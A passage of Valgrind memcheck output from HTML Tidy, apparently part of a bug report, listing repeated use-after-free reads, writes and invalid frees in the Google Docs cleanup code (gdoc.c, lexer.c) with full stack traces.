==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x43461F: prvTidyFreeNode (src/lexer.c:1552)
==1752197== by 0x41D5DC: DiscardContainer (src/gdoc.c:89)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e60 is 16 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x434A24: prvTidyFreeAttrs (src/lexer.c:1469)
==1752197== by 0x434633: prvTidyFreeNode (src/lexer.c:1554)
==1752197== by 0x41D5DC: DiscardContainer (src/gdoc.c:89)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e78 is 40 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x43463C: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x41D5DC: DiscardContainer (src/gdoc.c:89)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e68 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x434666: prvTidyFreeNode (src/lexer.c:1556)
==1752197== by 0x41D5DC: DiscardContainer (src/gdoc.c:89)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e90 is 64 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid free() / delete / delete[] / realloc()
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43466B: prvTidyFreeNode (src/lexer.c:1556)
==1752197== by 0x41D5DC: DiscardContainer (src/gdoc.c:89)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42f00 is 0 bytes inside a block of size 5 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43466B: prvTidyFreeNode (src/lexer.c:1556)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x416BC9: prvTidytmbstrndup (src/tmbstr.c:32)
==1752197== by 0x439B7C: TagToken (src/lexer.c:1599)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 4
==1752197== at 0x434672: prvTidyFreeNode (src/lexer.c:1557)
==1752197== by 0x41D5DC: DiscardContainer (src/gdoc.c:89)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42ea0 is 80 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid free() / delete / delete[] / realloc()
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x41D5DC: DiscardContainer (src/gdoc.c:89)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e50 is 0 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D53D: DiscardContainer (src/gdoc.c:77)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c46d08 is 8 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D545: DiscardContainer (src/gdoc.c:77)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c46d18 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid write of size 8
==1752197== at 0x41D549: DiscardContainer (src/gdoc.c:77)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c46f28 is 8 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D551: DiscardContainer (src/gdoc.c:78)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c46d18 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D559: DiscardContainer (src/gdoc.c:78)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
